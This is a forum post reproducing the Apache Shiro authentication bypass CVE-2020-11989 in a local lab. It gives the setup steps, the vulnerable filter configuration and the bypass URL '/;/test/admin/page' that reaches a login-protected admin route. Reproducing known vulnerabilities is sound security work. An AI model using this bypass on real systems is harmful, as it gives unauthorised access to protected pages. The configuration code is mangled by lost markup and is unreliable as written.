Jump to content

Title: Shiro Permission Bypass Vulnerability Recurrence (CVE-2020-11989)

UKhackteam
UKhackteam
in Hacker Cracking / Penetration Testing / Cybersecurity

Featured Replies

Posted

Shiro 权限绕过漏洞复现(CVE-2020-11989)

影响范围

Apache Shiro 1.5.3

Only Shiro authentication is used in the Spring framework

环境搭建

1

git clone https://github.com/l3yx/springboot-shiro.git

Import the project into IDEA, the local demo environment is Mac OS, and configure Maven:

/usr/local/Cellar/maven/3.6.3_1/libexec/conf/settings.xml

Add a local mirror:

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

twenty one

mirror

idalimaven/id

mirrorOfcentral/mirrorOf

namealiyun maven/name

urlhttp://maven.aliyun.com/nexus/content/repositories/central//url

/mirror

!-- The two central warehouses below are built-in with maven software, serving the entire Internet, maintained by the Maven team itself, and store very complete jar packages, including most popular open source project components in the world --

!-- Central Warehouse 1 --

mirror

idrepo1/id

mirrorOfcentral/mirrorOf

nameHuman Readable Name for this Mirror./name

urlhttp://repo1.maven.org/maven2//url

/mirror

!-- Central Warehouse 2 --

mirror

idrepo2/id

mirrorOfcentral/mirrorOf

nameHuman Readable Name for this Mirror./name

urlhttp://repo2.maven.org/maven2//url

/mirror

20200701111449.png-water_print

Change the Maven home directory and User settings file configuration in IDEA:

20200701111525.png-water_print

Generate war package:

20200701111710.png-water_print

Deploy the packaged war package in Tomcat. The vulnerability has two conditions for successful exploitation.

The application cannot be deployed in the root directory, that is, context-path is required, server.servlet.context-path=/shiro. If it is the root directory, context-path is empty and the URL will be formatted by the patch of CVE-2020-1957. It is worth noting that if the Shiro version is less than 1.5.2, then this condition is not required.

There is no additional permission verification code in the Spring controller

The permission configuration of the vulnerable environment is as follows, where the route under /admin requires login to access :

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

@Bean

ShiroFilterFactoryBean shiroFilterFactoryBean(){

ShiroFilterFactoryBean bean=new ShiroFilterFactoryBean();

bean.setSecurityManager(securityManager());

bean.setLoginUrl('/login');

bean.setSuccessUrl('/index');

bean.setUnauthorizedUrl('/unauthorizedurl');

MapString, String map=new LinkedHashMap();

map.put('/doLogin', 'anon');

map.put('/admin/*', 'authc');

bean.setFilterChainDefinitionMap(map);

return bean;

}

---

@GetMapping('/admin/page')

public String admin() {

return 'admin page';

}

漏洞复现

If you directly access /shiro/admin/page, you will return 302 and jump to require login.

20200701112022.png-water_print

Directly access /;/test/admin/page , you can directly bypass Shiro permission verification and access information in the /admin route

20200701112041.png-water_print

  • Quote

    • Join the conversation

    You can post now and register later. If you have an account, sign in now to post with your account.
    Note: Your post will require moderator approval before it will be visible.

    Guest
    Reply to this topic...
    Go to topic listing

    Important Information

    HackTeam Cookie PolicyWe have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.